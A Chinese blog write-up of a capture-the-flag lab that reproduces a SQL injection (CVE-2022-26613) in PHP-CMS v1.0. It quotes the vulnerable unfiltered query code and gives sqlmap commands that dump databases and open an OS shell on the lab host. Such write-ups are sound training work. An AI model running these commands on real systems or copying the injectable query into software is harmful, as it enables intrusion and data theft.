【漏洞复现】PHP-CMS v1.0 SQL注入漏洞(CVE-2022-26613)

【漏洞复现】PHP-CMS v1.0 SQL注入漏洞(CVE-2022-26613)


0x01 漏洞描述

春秋云镜靶场:PHP-CMS v1.0存在SQL注入漏洞,攻击者可获得敏感信息。

CVE:PHP-CMS v1.0 was discovered to contain a SQL injection vulnerability via the category parameter in categorymenu.php.

0x02 影响版本

PHP-CMS v1.0

http://pwned_host.com/PHP-CMS-master/categorymenu.php
http://pwned_host.com/PHP-CMS-master/forgot.php
http://pwned_host.com/PHP-CMS-master/post.php 
http://pwned_host.com/PHP-CMS-master/search.php 

0x03 漏洞分析

用户可以在没有任何过滤器的情况下通过GET方法控制参数category。

源码:

<?php
if(isset($_GET['category'])){
    $post_category_id = $_GET['category'];
}
$query = "SELECT * FROM posts WHERE post_category_id = {$post_category_id} ";
$select_all_posts_count_query = mysqli_query($connection,$query);
$count = mysqli_num_rows($select_all_posts_count_query);
confirm_query($select_all_posts_count_query);
……
while($row = mysqli_fetch_assoc($select_all_posts_count_query)){
    $post_id = $row['post_id'];
    $post_title = $row['post_title'];
    $post_user = $row['post_user'];
    $post_date = $row['post_date'];
    $post_image = $row['post_image'];
    $post_content = $row['post_content'];
?>

详细参考:https://github.com/harshitbansal373/PHP-CMS/issues/14

0x04 漏洞复现

进入靶场,界面如下:

点击页面右下角Categories中的#home标签,转入categorymenu.php?category=1页面,单引号测试存在注入点

使用sqlmap爆库名

sqlmap -u http://eci-2ze94kj4tmvxvn4d1y45.cloudeci1.ichunqiu.com/categorymenu.php?category=1 --dbs

没有发现明显的flag提示,继续测试数据库mysql和cms

sqlmap -u http://eci-2ze94kj4tmvxvn4d1y45.cloudeci1.ichunqiu.com/categorymenu.php?category=1 -D mysql --tables
sqlmap -u http://eci-2ze94kj4tmvxvn4d1y45.cloudeci1.ichunqiu.com/categorymenu.php?category=1 -D cms --tables

猜测可能不在数据库中,使用os-shell命令直接从根目录找/flag

sqlmap -u http://eci-2ze94kj4tmvxvn4d1y45.cloudeci1.ichunqiu.com/categorymenu.php?category=1 --os-shell

找到flag


posted @ 2023-03-18 16:49  0dot7  阅读(517)  评论(0编辑  收藏  举报